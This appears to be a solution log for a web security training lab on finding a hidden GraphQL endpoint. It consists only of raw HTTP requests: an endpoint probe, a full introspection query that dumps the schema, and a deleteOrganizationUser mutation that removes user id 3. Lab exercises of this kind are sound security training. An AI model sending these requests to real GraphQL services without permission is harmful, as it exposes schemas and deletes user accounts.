Lab: Finding a hidden GraphQL endpoint

https://portswigger.net/web-security/learning-paths/graphql-api-vulnerabilities/bypassing-graphql-introspection-defenses/graphql/lab-graphql-find-the-endpoint#

GET /api?query=query{__typename} HTTP/2
Host: 0a8d00b603fd88038283933e007d00e6.web-security-academy.net
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Cache-Control: max-age=0
Cookie: session=l0s2k3S2dl12443QTmAEa1lSCgduNCXs
Upgrade-Insecure-Requests: 1
Referer: https://0a8d00b603fd88038283933e007d00e6.web-security-academy.net/
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="131", "Chromium";v="131"
Sec-Ch-Ua-Platform: Windows
Sec-Ch-Ua-Mobile: ?0

GET /api?query=query+IntrospectionQuery+%7b%0a++++__schema%0a+%7b%0a++++++++queryType+%7b%0a++++++++++++name%0a++++++++%7d%0a++++++++mutationType+%7b%0a++++++++++++name%0a++++++++%7d%0a++++++++subscriptionType+%7b%0a++++++++++++name%0a++++++++%7d%0a++++++++types+%7b%0a++++++++++++...FullType%0a++++++++%7d%0a++++++++directives+%7b%0a++++++++++++name%0a++++++++++++description%0a++++++++++++locations%0a++++++++++++args+%7b%0a++++++++++++++++...InputValue%0a++++++++++++%7d%0a++++++++%7d%0a++++%7d%0a%7d%0a%0afragment+FullType+on+__Type+%7b%0a++++kind%0a++++name%0a++++description%0a++++fields%28includeDeprecated%3a+true%29+%7b%0a++++++++name%0a++++++++description%0a++++++++args+%7b%0a++++++++++++...InputValue%0a++++++++%7d%0a++++++++type+%7b%0a++++++++++++...TypeRef%0a++++++++%7d%0a++++++++isDeprecated%0a++++++++deprecationReason%0a++++%7d%0a++++inputFields+%7b%0a++++++++...InputValue%0a++++%7d%0a++++interfaces+%7b%0a++++++++...TypeRef%0a++++%7d%0a++++enumValues%28includeDeprecated%3a+true%29+%7b%0a++++++++name%0a++++++++description%0a++++++++isDeprecated%0a++++++++deprecationReason%0a++++%7d%0a++++possibleTypes+%7b%0a++++++++...TypeRef%0a++++%7d%0a%7d%0a%0afragment+InputValue+on+__InputValue+%7b%0a++++name%0a++++description%0a++++type+%7b%0a++++++++...TypeRef%0a++++%7d%0a++++defaultValue%0a%7d%0a%0afragment+TypeRef+on+__Type+%7b%0a++++kind%0a++++name%0a++++ofType+%7b%0a++++++++kind%0a++++++++name%0a++++++++ofType+%7b%0a++++++++++++kind%0a++++++++++++name%0a++++++++++++ofType+%7b%0a++++++++++++++++kind%0a++++++++++++++++name%0a++++++++++++%7d%0a++++++++%7d%0a++++%7d%0a%7d HTTP/2
Host: 0a8d00b603fd88038283933e007d00e6.web-security-academy.net
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Cache-Control: max-age=0
Cookie: session=l0s2k3S2dl12443QTmAEa1lSCgduNCXs
Upgrade-Insecure-Requests: 1
Referer: https://0a8d00b603fd88038283933e007d00e6.web-security-academy.net/
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="131", "Chromium";v="131"
Sec-Ch-Ua-Platform: Windows
Sec-Ch-Ua-Mobile: ?0

GET /api?query=mutation%28%24input%3a+DeleteOrganizationUserInput%29+%7b%0a++deleteOrganizationUser%28input%3a+%24input%29+%7b%0a++++user+%7b%0a++++++id%0a++++++username%0a++++%7d%0a++%7d%0a%7d&variables=%7b%22input%22%3a%7b%22id%22%3a3%7d%7d HTTP/2
Host: 0a8d00b603fd88038283933e007d00e6.web-security-academy.net
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Cache-Control: max-age=0
Cookie: session=l0s2k3S2dl12443QTmAEa1lSCgduNCXs
Upgrade-Insecure-Requests: 1
Referer: https://0a8d00b603fd88038283933e007d00e6.web-security-academy.net/
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="131", "Chromium";v="131"
Sec-Ch-Ua-Platform: Windows
Sec-Ch-Ua-Mobile: ?0

Last updated 3 months ago